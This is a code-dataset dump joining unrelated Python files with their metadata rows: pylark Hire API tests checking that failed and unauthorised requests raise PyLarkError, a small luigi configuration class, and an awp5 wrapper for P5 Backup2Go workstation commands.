                    attachment_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_get_hire_resume_source(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_resume_source(pylark.GetHireResumeSourceReq())
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_create_hire_note(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.create_hire_note(pylark.CreateHireNoteReq())
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_update_hire_note(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.update_hire_note(
                pylark.UpdateHireNoteReq(
                    note_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_get_hire_note(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_note(
                pylark.GetHireNoteReq(
                    note_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_get_hire_note_list(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_note_list(pylark.GetHireNoteListReq())
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_get_hire_referral_by_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_referral_by_application(
                pylark.GetHireReferralByApplicationReq()
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_get_hire_job_process_list(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_job_process_list(pylark.GetHireJobProcessListReq())
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_create_hire_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.create_hire_application(pylark.CreateHireApplicationReq())
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_terminate_hire_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.terminate_hire_application(
                pylark.TerminateHireApplicationReq(
                    application_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_get_hire_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_application(
                pylark.GetHireApplicationReq(
                    application_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_get_hire_application_list(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_application_list(
                pylark.GetHireApplicationListReq()
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_get_hire_application_interview_list(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_application_interview_list(
                pylark.GetHireApplicationInterviewListReq(
                    application_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_get_hire_offer_by_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_offer_by_application(
                pylark.GetHireOfferByApplicationReq(
                    application_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_get_hire_offer_schema(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_offer_schema(
                pylark.GetHireOfferSchemaReq(
                    offer_schema_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_make_hire_transfer_onboard_by_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.make_hire_transfer_onboard_by_application(
                pylark.MakeHireTransferOnboardByApplicationReq(
                    application_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_update_hire_employee(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.update_hire_employee(
                pylark.UpdateHireEmployeeReq(
                    employee_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_get_hire_employee_by_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_employee_by_application(
                pylark.GetHireEmployeeByApplicationReq()
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_get_hire_employee(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_employee(
                pylark.GetHireEmployeeReq(
                    employee_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
# real request
class TestHireSampleRealRequestFailed(unittest.TestCase):
    """Hire API tests issued through a client without permissions.

    Each call goes to the real transport with an app that lacks the
    required scopes, so the server must reject it; the wrappers are
    expected to raise pylark.PyLarkError with a positive error code.
    """
    def __init__(self, *args, **kwargs):
        super(TestHireSampleRealRequestFailed, self).__init__(*args, **kwargs)
        # Client deliberately configured without the hire permissions.
        self.cli = app_no_permission.ins()
        self.module_cli = self.cli.hire
    def test_real_request_get_hire_job(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_job(
                pylark.GetHireJobReq(
                    job_id=1,
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_get_hire_job_manager(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_job_manager(
                pylark.GetHireJobManagerReq(
                    job_id="x",
                    manager_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_get_hire_talent(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_talent(
                pylark.GetHireTalentReq(
                    talent_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_get_hire_attachment(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_attachment(
                pylark.GetHireAttachmentReq(
                    attachment_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_get_hire_attachment_preview(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_attachment_preview(
                pylark.GetHireAttachmentPreviewReq(
                    attachment_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_get_hire_resume_source(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_resume_source(pylark.GetHireResumeSourceReq())
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_create_hire_note(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.create_hire_note(pylark.CreateHireNoteReq())
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_update_hire_note(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.update_hire_note(
                pylark.UpdateHireNoteReq(
                    note_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_get_hire_note(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_note(
                pylark.GetHireNoteReq(
                    note_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_get_hire_note_list(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_note_list(pylark.GetHireNoteListReq())
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_get_hire_referral_by_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_referral_by_application(
                pylark.GetHireReferralByApplicationReq()
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_get_hire_job_process_list(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_job_process_list(pylark.GetHireJobProcessListReq())
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_create_hire_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.create_hire_application(pylark.CreateHireApplicationReq())
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_terminate_hire_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.terminate_hire_application(
                pylark.TerminateHireApplicationReq(
                    application_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_get_hire_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_application(
                pylark.GetHireApplicationReq(
                    application_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_get_hire_application_list(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_application_list(
                pylark.GetHireApplicationListReq()
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_get_hire_application_interview_list(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_application_interview_list(
                pylark.GetHireApplicationInterviewListReq(
                    application_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_get_hire_offer_by_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_offer_by_application(
                pylark.GetHireOfferByApplicationReq(
                    application_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_get_hire_offer_schema(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_offer_schema(
                pylark.GetHireOfferSchemaReq(
                    offer_schema_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_make_hire_transfer_onboard_by_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.make_hire_transfer_onboard_by_application(
                pylark.MakeHireTransferOnboardByApplicationReq(
                    application_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_update_hire_employee(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.update_hire_employee(
                pylark.UpdateHireEmployeeReq(
                    employee_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_get_hire_employee_by_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_employee_by_application(
                pylark.GetHireEmployeeByApplicationReq()
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
    def test_real_request_get_hire_employee(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_employee(
                pylark.GetHireEmployeeReq(
                    employee_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
| 36.717811
| 88
| 0.666024
| 4,259
| 34,221
| 5.027706
| 0.026532
| 0.061131
| 0.100173
| 0.088918
| 0.971279
| 0.969785
| 0.953626
| 0.938122
| 0.901975
| 0.85845
| 0
| 0.001966
| 0.256772
| 34,221
| 931
| 89
| 36.75725
| 0.839939
| 0.003185
| 0
| 0.623229
| 1
| 0
| 0.03882
| 0.016185
| 0
| 0
| 0
| 0
| 0.228045
| 1
| 0.13881
| false
| 0
| 0.007082
| 0
| 0.151558
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
18c942c655708445dfaca011c4c8751a24f1fe3d
| 213
|
py
|
Python
|
luigi_soft_failures/config.py
|
0xddom/luigi_soft_failures
|
b4ecaae22daec5f14c1491de7326baa787930bc8
|
[
"MIT"
] | 3
|
2019-06-28T13:46:26.000Z
|
2020-06-11T13:36:19.000Z
|
luigi_soft_failures/config.py
|
0xddom/luigi_soft_failures
|
b4ecaae22daec5f14c1491de7326baa787930bc8
|
[
"MIT"
] | null | null | null |
luigi_soft_failures/config.py
|
0xddom/luigi_soft_failures
|
b4ecaae22daec5f14c1491de7326baa787930bc8
|
[
"MIT"
] | 1
|
2022-02-28T15:18:24.000Z
|
2022-02-28T15:18:24.000Z
|
import luigi
import os
class Config(luigi.Config):
    """Package-level luigi configuration for luigi_soft_failures."""
    # Namespace keeps these parameters under a [luigi_soft_failures] section.
    task_namespace = 'luigi_soft_failures'
    # Directory where output is written; overridable via the
    # LUIGI_SOFT_FAILURES_OUTPUT_DIR environment variable.
    output_dir = luigi.Parameter(
        default=os.environ.get('LUIGI_SOFT_FAILURES_OUTPUT_DIR', 'soft_failures'))
| 23.666667
| 82
| 0.751174
| 28
| 213
| 5.392857
| 0.535714
| 0.238411
| 0.225166
| 0.304636
| 0.344371
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150235
| 213
| 8
| 83
| 26.625
| 0.834254
| 0
| 0
| 0
| 0
| 0
| 0.29108
| 0.140845
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
18ec531abb6d805c31cac661ab3f74547cf70860
| 23,895
|
py
|
Python
|
awp5/api/workstation.py
|
ThomasWaldinger/py_awp5
|
10077ab81eab506bea58a67242c2d550988ec18c
|
[
"Apache-2.0"
] | 2
|
2019-04-10T16:46:19.000Z
|
2020-08-18T21:57:59.000Z
|
awp5/api/workstation.py
|
ThomasWaldinger/py_awp5
|
10077ab81eab506bea58a67242c2d550988ec18c
|
[
"Apache-2.0"
] | null | null | null |
awp5/api/workstation.py
|
ThomasWaldinger/py_awp5
|
10077ab81eab506bea58a67242c2d550988ec18c
|
[
"Apache-2.0"
] | null | null | null |
# -------------------------------------------------------------------------
# Copyright (c) Thomas Waldinger. All rights reserved.
# Licensed under the Apache License, Version 2.0. See
# License.txt in the project root for license
# information.
# ---------------
"""
Workstation
Queries Backup2Go workstation resources configured on the Backup2Go Server and
queries and controls their parameters. These commands are to be executed on the
Backup2Go server.
A P5 workstation is the computer running the P5 client software in a Backup2Go
infrastructure. To configure and maintain workstation resources, use the
standard system-administrator account in the P5 Web GUI
"""
from awp5.base.connection import P5Resource, exec_nsdchat
from awp5.base.helpers import resourcelist, onereturnvalue
from awp5.api.backup2go import Backup2Go
module_name = "Workstation"
def names(as_object=False, p5_connection=None):
    """Return the names of all configured workstations.

    When *as_object* is true, the names are wrapped as Workstation
    resource objects instead of returned as plain strings.
    """
    raw = exec_nsdchat([module_name, "names"], p5_connection)
    if as_object:
        return resourcelist(raw, Workstation, p5_connection)
    return raw
@onereturnvalue
def describe(workstation_name, p5_connection=None):
    """Return the human-readable description of workstation <name>.

    Returns the string "<empty>" when no description is assigned.
    """
    return exec_nsdchat(
        [module_name, workstation_name, "describe"], p5_connection)
@onereturnvalue
def disabled(workstation_name, p5_connection=None):
    """Query the Disabled status: "1" (disabled) or "0" (enabled)."""
    return exec_nsdchat(
        [module_name, workstation_name, "disabled"], p5_connection)
@onereturnvalue
def enabled(workstation_name, p5_connection=None):
    """Query the Enabled status: "1" (enabled) or "0" (disabled)."""
    return exec_nsdchat(
        [module_name, workstation_name, "enabled"], p5_connection)
@onereturnvalue
def hostid(workstation_name, p5_connection=None):
    """Return the configured P5 machine-ID of workstation <name>."""
    return exec_nsdchat(
        [module_name, workstation_name, "hostid"], p5_connection)
@onereturnvalue
def lastbegin(workstation_name, p5_connection=None):
    """Posix time (seconds) at which the last backup of <name> started."""
    return exec_nsdchat(
        [module_name, workstation_name, "lastbegin"], p5_connection)
@onereturnvalue
def lastend(workstation_name, p5_connection=None):
    """Posix time (seconds) of the successful end of the last backup of <name>.

    A value older than lastbegin() indicates an incomplete (interrupted)
    backup.
    """
    return exec_nsdchat(
        [module_name, workstation_name, "lastend"], p5_connection)
@onereturnvalue
def lasterror(workstation_name, p5_connection=None):
    """Error message of the last backup run for <name>, or "<empty>" if none."""
    return exec_nsdchat(
        [module_name, workstation_name, "lasterror"], p5_connection)
@onereturnvalue
def nextrun(workstation_name, p5_connection=None):
    """Posix time (seconds) of the next anticipated backup of the workstation."""
    return exec_nsdchat(
        [module_name, workstation_name, "nextrun"], p5_connection)
@onereturnvalue
def peerip(workstation_name, p5_connection=None):
    """Last known IP of <name> in dot notation, or "<empty>" if never connected."""
    return exec_nsdchat(
        [module_name, workstation_name, "peerip"], p5_connection)
@onereturnvalue
def snapshots(workstation_name, since="", p5_connection=None):
    """List snapshot IDs kept for the given workstation.

    The optional *since* (seconds, Posix time) restricts the result to
    snapshots taken after that date; all known snapshots otherwise.
    """
    return exec_nsdchat(
        [module_name, workstation_name, "snapshots", since], p5_connection)
@onereturnvalue
def snapsize(workstation_name, snapshotId, p5_connection=None):
    """Allocated size in KBytes of data maintained for the named workstation.

    For link-based snapshots, one or multiple *snapshotId* values (from
    snapshots()) may be given; the result sums the current state and the
    given snapshots. For native snapshots (ZFS, BTRFS) at most one ID is
    accepted: its logical size is returned, or the current state's size
    when omitted; the value does not reflect required disk space. May be
    a lengthy operation for many files/snapshots.
    """
    return exec_nsdchat(
        [module_name, workstation_name, "snapsize", snapshotId],
        p5_connection)
@onereturnvalue
def totalfiles(workstation_name, p5_connection=None):
    """
    Syntax: Workstation <name> totalfiles
    Description: Returns the number of files transferred from the workstation
    <name> in the last backup operation
    Return Values:
    -On Success: the number of files
    """
    # Bug fix: previously sent the "peerip" command (copy-paste error),
    # so callers received the workstation IP instead of the file count.
    method_name = "totalfiles"
    return exec_nsdchat([module_name, workstation_name, method_name],
                        p5_connection)
@onereturnvalue
def totalkbytes(workstation_name, p5_connection=None):
    """
    Syntax: Workstation <name> totalkbytes
    Description: Returns the number of KBytes transferred from the workstation
    <name> in the last backup operation
    Return Values:
    -On Success: the number of KBytes
    """
    # Bug fix: previously sent the "peerip" command (copy-paste error),
    # so callers received the workstation IP instead of the KByte count.
    method_name = "totalkbytes"
    return exec_nsdchat([module_name, workstation_name, method_name],
                        p5_connection)
@onereturnvalue
def retaintime(workstation_name, p5_connection=None):
    """
    Syntax: Workstation <name> retaintime
    Description: Returns the retention time setting for workstation snapshots.
    Return Values:
    -On Success: the retention time in seconds
    """
    # Bug fix: previously sent the "peerip" command (copy-paste error),
    # so callers received the workstation IP instead of the retention time.
    method_name = "retaintime"
    return exec_nsdchat([module_name, workstation_name, method_name],
                        p5_connection)
@onereturnvalue
def template(workstation_name, p5_connection=None):
    """Return the template ID configured for workstation <name>."""
    return exec_nsdchat(
        [module_name, workstation_name, "template"], p5_connection)
@onereturnvalue
def configure(hostname, port, username, password, template="",
              p5_connection=None):
    """Register a remote workstation on the P5 Backup2Go server.

    Run on the Backup2Go server: connects to <hostname>:<port> and, based
    on the remote host ID, creates or reuses the server-side workstation
    record. The workstation is seeded with a unique login token shared
    with the server, so <username>/<password> need not be stored on it.
    The optional *template* selects the template to apply; the generic
    template is used otherwise.

    Returns a positive integer string (the new workstation name) on
    success; on failure "-3" (template could not be set), "-2" (wrong
    user name/password) or "-1" (network connection problem — bad address
    and/or port).
    """
    return exec_nsdchat(
        [module_name, "configure", hostname, port, username, password,
         template], p5_connection)
@onereturnvalue
def disable(workstation_name, p5_connection=None):
    """Set the workstation to the Disabled state; returns the string "0"."""
    return exec_nsdchat(
        [module_name, workstation_name, "disable"], p5_connection)
@onereturnvalue
def enable(workstation_name, p5_connection=None):
    """Set the workstation to the Enabled state; returns the string "1"."""
    return exec_nsdchat(
        [module_name, workstation_name, "enable"], p5_connection)
@onereturnvalue
def name(p5_connection=None):
    """Return the Workstation ID of the machine the command is executed on.

    Unlike the other workstation commands, this must be called on the
    workstation itself; returns the ID or the string "unknown".
    """
    return exec_nsdchat([module_name, "name"], p5_connection)
class Workstation(P5Resource):
    """P5 Backup2Go workstation resource.

    Wraps the nsdchat "Workstation" CLI module: instance methods issue
    "Workstation <name> <method>" commands through the stored P5
    connection. Methods that do not address a specific workstation
    (names, configure, name) are static and use a plain connection.
    """

    def __init__(self, workstation_name, p5_connection=None):
        super().__init__(workstation_name, p5_connection)

    @staticmethod
    def names(as_object=True, p5_connection=None):
        """
        Syntax: Workstation names
        Description: Returns the list of names of all workstations
        Return Values:
        -On Success: the list of names (or Workstation objects when
         as_object is True)
        """
        method_name = "names"
        result = exec_nsdchat([module_name, method_name], p5_connection)
        if not as_object:
            return result
        else:
            return resourcelist(result, Workstation, p5_connection)

    @onereturnvalue
    def describe(self):
        """
        Syntax: Workstation <name> describe
        Description: Returns a human-readable description of the workstation
        <name>. If the workstation does not have a description assigned, the
        command returns the string "<empty>"
        Return Values:
        -On Success: the workstation description
        """
        method_name = "describe"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name])

    @onereturnvalue
    def disabled(self):
        """
        Syntax: Workstation <name> disabled
        Description: Queries the workstations Disabled status
        Return Values:
        -On Success: the string "1" (disabled) or "0" (enabled)
        """
        method_name = "disabled"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name])

    @onereturnvalue
    def enabled(self):
        """
        Syntax: Workstation <name> enabled
        Description: Queries the workstation Enabled status
        Return Values:
        -On Success: the string "1" (enabled) or "0" (disabled)
        """
        method_name = "enabled"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name])

    @onereturnvalue
    def hostid(self):
        """
        Syntax: Workstation <name> hostid
        Description: Returns the configured P5 machine-ID of the workstation
        <name>.
        Return Values:
        -On Success: the workstation's machine ID
        """
        method_name = "hostid"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name])

    @onereturnvalue
    def lastbegin(self):
        """
        Syntax: Workstation <name> lastbegin
        Description: Returns the absolute time in seconds (Posix time) of the
        start of the last backup operation for the workstation <name>
        Return Values:
        -On Success: the time in seconds (Posix time)
        """
        method_name = "lastbegin"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name])

    @onereturnvalue
    def lastend(self):
        """
        Syntax: Workstation <name> lastend
        Description: Returns the absolute time in seconds (Posix time) of the
        successful end of the last backup operation for the workstation <name>.
        This time may be older than the time returned by the lastbegin method
        indicating an incomplete (interrupted) backup.
        Return Values:
        -On Success: the time in seconds (Posix time)
        """
        method_name = "lastend"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name])

    @onereturnvalue
    def lasterror(self):
        """
        Syntax: Workstation <name> lasterror
        Description: Returns the error message that resulted from the last
        backup run for the workstation <name>.
        The string "<empty>" is returned in case there is no last error.
        Return Values:
        -On Success: the error message or the string "<empty>"
        """
        method_name = "lasterror"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name])

    @onereturnvalue
    def nextrun(self):
        """
        Syntax: Workstation <name> nextrun
        Description: Returns the absolute time in seconds (Posix time) of the
        next anticipated backup of the workstation
        Return Values:
        -On Success: the time in seconds (Posix time)
        """
        method_name = "nextrun"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name])

    @onereturnvalue
    def peerip(self):
        """
        Syntax: Workstation <name> peerip
        Description: Returns the last known IP of the workstation <name>. If
        the workstation does not have an IP recorded so far (for example, it
        never got connected to the server), the command returns the string
        "<empty>"
        Return Values:
        -On Success: the workstation IP address in standard dot notation
        """
        method_name = "peerip"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name])

    @onereturnvalue
    def snapshots(self, since=""):
        """
        Syntax: Workstation <name> snapshots [<since>]
        Description: Returns a list of snapshots maintained for the given
        workstation. The optional <since> argument may be given in seconds
        (Posix time) to address only snapshots since that date. Otherwise all
        known snapshots are returned.
        Return Values:
        -On Success: a list of snapshots IDs
        """
        method_name = "snapshots"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name, since])

    @onereturnvalue
    def snapsize(self, snapshotId):
        """
        Syntax: Workstation <name> snapsize [<snapshotId>]
        Description: Returns the allocated size in KBytes of data maintained
        for the named workstation. On link based snapshots, one or multiple
        <snapshotId> arguments (as returned by the snapshots method) can be
        given. The return value is then the allocated size for the current and
        all optional given snapshots summed up.
        On native snapshots (ZFS, BTRFS), this method accepts one or none
        <snapshotId> as parameter. If a snapshot ID is given, the logical size
        of that snapshot is returned, otherwise the size of the current state
        is returned. The return value does not reflect the required disk space
        of native snapshots. All returned sizes are in Kbyte.
        Note that this may be a lengthy operation, depending on the number of
        files and snapshots.
        Return Values:
        -On Success: the number of KBytes
        """
        method_name = "snapsize"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name, snapshotId])

    @onereturnvalue
    def totalfiles(self):
        """
        Syntax: Workstation <name> totalfiles
        Description: Returns the number of files transferred from the
        workstation <name> in the last backup operation
        Return Values:
        -On Success: the number of files
        """
        # BUG FIX: was "peerip" (copy-paste error) — queried the wrong
        # attribute and returned an IP address instead of the file count.
        method_name = "totalfiles"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name])

    @onereturnvalue
    def totalkbytes(self):
        """
        Syntax: Workstation <name> totalkbytes
        Description: Returns the number of KBytes transferred from the
        workstation <name> in the last backup operation
        Return Values:
        -On Success: the number of KBytes
        """
        # BUG FIX: was "peerip" (copy-paste error).
        method_name = "totalkbytes"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name])

    @onereturnvalue
    def retaintime(self):
        """
        Syntax: Workstation <name> retaintime
        Description: Returns the retention time setting for workstation
        snapshots.
        Return Values:
        -On Success: the retention time in seconds
        """
        # BUG FIX: was "peerip" (copy-paste error).
        method_name = "retaintime"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name])

    @onereturnvalue
    def template(self):
        """
        Syntax: Workstation <name> template
        Description: Returns the template ID for workstation <name>.
        Return Values:
        -On Success: the template ID
        """
        method_name = "template"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name])

    @staticmethod
    @onereturnvalue
    def configure(hostname, port, username, password, template="",
                  p5_connection=None):
        """
        Syntax: Workstation configure <hostname> <port> <username> <password>
        [<template>]
        Description: Run this command on the P5 Backup2Go Server.
        Using the passed connection parameters <hostname> and <port>, tries to
        establish the connection to the remote workstation and, based on it's
        host ID, create or reuse the workstation record on the server.
        For the purpose of logging in to the server, the workstation will be
        seeded with a unique token, shared by the workstation and the server.
        This eliminates the need for storing the <username> and/or <password>
        for accessing the server on the workstation.
        If the optional <template> is given, the workstation is set to use the
        given template. Otherwise the workstation is set to use the generic
        template.
        Return Values:
        -On Success: a positive integer as a string
                     (the name of the new local workstation)
        -On Failure: the string "-3": the template could not be set
                     the string "-2": a wrong user name/password is given
                     the string "-1": there is a network connection problem
                     (bad address and/or port)
        """
        method_name = "configure"
        return exec_nsdchat([module_name, method_name, hostname, port,
                             username, password, template],
                            p5_connection)

    @onereturnvalue
    def disable(self):
        """
        Syntax: Workstation <name> disable
        Description: Sets the workstation to the Disabled state
        Return Values:
        -On Success: the string "0"
        """
        method_name = "disable"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name])

    @onereturnvalue
    def enable(self):
        """
        Syntax: Workstation <name> enable
        Description: Sets the workstation to the Enabled state
        Return Values:
        -On Success: the string "1"
        """
        method_name = "enable"
        return self.p5_connection.nsdchat_call([module_name, self.name,
                                                method_name])

    @staticmethod
    @onereturnvalue
    def name(p5_connection=None):
        """
        Syntax: Workstation name
        Description: Returns the Workstation ID of the workstation where the
        command is executed
        Note:
        Unlike all the other workstation commands, this command must be called
        on the Workstation
        Return Values:
        -On Success: the ID or the string "unknown"
        """
        # NOTE(review): instance methods above read self.name as an
        # attribute — presumably P5Resource.__init__ sets it, shadowing
        # this static method on instances; confirm against P5Resource.
        method_name = "name"
        return exec_nsdchat([module_name, method_name], p5_connection)

    def __repr__(self):
        return ": ".join([module_name, self.name])
| 37.689274
| 79
| 0.640594
| 2,730
| 23,895
| 5.503663
| 0.09707
| 0.08985
| 0.037271
| 0.055907
| 0.91574
| 0.913677
| 0.911547
| 0.911547
| 0.880599
| 0.874476
| 0
| 0.006288
| 0.287884
| 23,895
| 633
| 80
| 37.748815
| 0.876704
| 0.520569
| 0
| 0.747664
| 0
| 0
| 0.031494
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.196262
| false
| 0.018692
| 0.014019
| 0.004673
| 0.415888
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e16678c5c86b803a556f71fdc615b9df352b0cb5
| 46
|
py
|
Python
|
logic.py
|
Dikower/Starlette-Alice
|
